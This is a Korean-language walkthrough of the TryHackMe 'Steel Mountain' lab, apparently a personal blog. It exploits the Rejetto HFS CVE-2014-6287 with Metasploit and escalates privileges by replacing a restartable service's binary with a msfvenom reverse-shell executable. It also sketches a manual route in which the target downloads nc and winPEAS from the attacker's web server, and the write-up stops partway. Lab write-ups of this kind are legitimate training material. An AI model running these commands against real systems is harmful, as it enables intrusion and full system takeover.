THM Offensive Pentesting - Steel Mountain

TASK 1

nmap

80번 포트 열린 것 확인, 웹 페이지 접속

 

이름 확인.

 

 

TASK 2 Initial Access

80 이외에 8080도 웹 서버 실행하고 있음

해당 웹서버는 Rejetto Http File Server임

2.3 버전에 CVE-2014-6287 취약점이 존재한다. (링크)

간단히 설명하자면, 검색 기능에서 %00를 이용하여 임의 프로그램을 실행할 수 있는 취약점임.

이 부분

 

metasploit 통해 exploit 해보자.

 

 

1.  모듈

 

2. 

use exploit/windows/http/rejetto_hfs_exec 

show options

# 필수 옵션 셋팅
set RHOSTS {target ip}
set RPORT {tartget port}
set SRVHOST 0.0.0.0
set SRVPORT 8080
set LHOSTS

exploit

meterpreter > shell

shell 진입 후 플래그 확인 가능 (위치는 알아서 찾을 것)

 

 

TASK 3  Privilege Escalation

권한상승을 위해 사용할 스크립트는 PowerUp.ps1 (링크)

*PowerUp : Clearing house of common privilege escalation checks, along with some weaponization vectors.

 

 

1. 해당 스크립트 다운로드 후 업로드

metepreter > upload /root/PowerUp.ps1

 

 

 

2. 스크립트를 실행하기 위해 powershell 환경으로 진입

load powershell

powershell_shell

 

 

3. PowerUp

PS > . .\PowerUp.ps1

PS > Invoke-Allchecks
# 모듈에 포함된 모든 검사 실행

 

출력된 결과에서 CanRestart가 true인 서비스를 찾아야 함.

"서비스를 다시 시작할 수 있는가?" 를 나타내는데, 변경사항을 적용하여 권한을 상승시키기 위해 꼭 필요함.

→ AdvancedSystemCareService9

 

*정상적인 응용 프로그램을 악성 프로그램으로 교체하고 서비스를 재식하여 악성 프로그램을 실행하기 위함

*참고: https://blog.certcube.com/powerup-cheatsheet/

 

 

4. msfvenom

msfvenom을 사용하여 악성 프로그램를 생성 → reverse shell

 

* meterpreter shell이 아닌, msf shell에서 실행

msfvenom -p windows/shell_reverse_tcp LHOST={local ip} LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe

# -p : 페이로드
# -e : 인코딩 방식
# -f : 출력 파일 포맷
# -o : 저장할 파일 이름

 

 

5. 업로드

1) AdvancedSystemCareService9  서비스로 위장하기 위해, 우선 해당 서비스를 종료한다.

meterpreter > shell

sc stop AdvancedSystemCareService9

 

2) 그리고 해당 서비스의 프로그램으로 위장(PowerUp 결과로 확인가능)

C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe

meterpreter > upload /root/Advanced.exe "C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

 

 

3) nc 리스닝

nc -lvnp 4443

 

 

4) 서비스 재시작

meterpreter > shell
sc start AdvancedSystemCareService9

 

 

6. 플래그

C:\Users\Administrator\Desktop\root.txt

 

 

---

TASK 4 

메타스플로잇을 사용하지 않고 Initial Access & Privilege Escalation 

 

0.  준비

- nc 파일 다운받기 (링크)

- winPEAS 다운받기 (링크)

 

1. exploit-db에서 스크립트 다운로드 (링크)

 

2. 스크립트 수정

ip_addr, local_port, vbs

 

3. 웹 서버 실행

python3 -m http.server 8888

익스플로잇 실행하면서 타겟이 nc.exe , winPEAS.exe 다운받도록 함

 

4. nc로 리스닝

nc -lvnp 443

 

5. 익스플로잇

python2 exploit.py {target ip} {target port}

 

6. winPEAS.exe를 다운받고, 침투한 시스템이 해당 파일을 가져가도록 powershell -c 사용 (링크)

*Windows OS에서 권한 상승 취약점을 찾는 데 도움이 되는 스크립트로, 사용 가능한 권한 상승 경로를 찾을 수 있음

powershell -c wget "http://10.10.182.98:8888/winPEASx64.exe" -outfile "winPEASx64.exe"

*powershell -c : cmd에서 powershell 명령어 사용 가능

*powershell -c Get-Service # 실행 중인 모든 서비스 출력

 

7. 실행

 

...

어택박스가 종료되어 버려서 여기까지 하겠음.

이후 동일하게 msfvenom로 악성 프로그램 생성한뒤 powershell로 가져오고, 권한 상승하면 된다고 한다.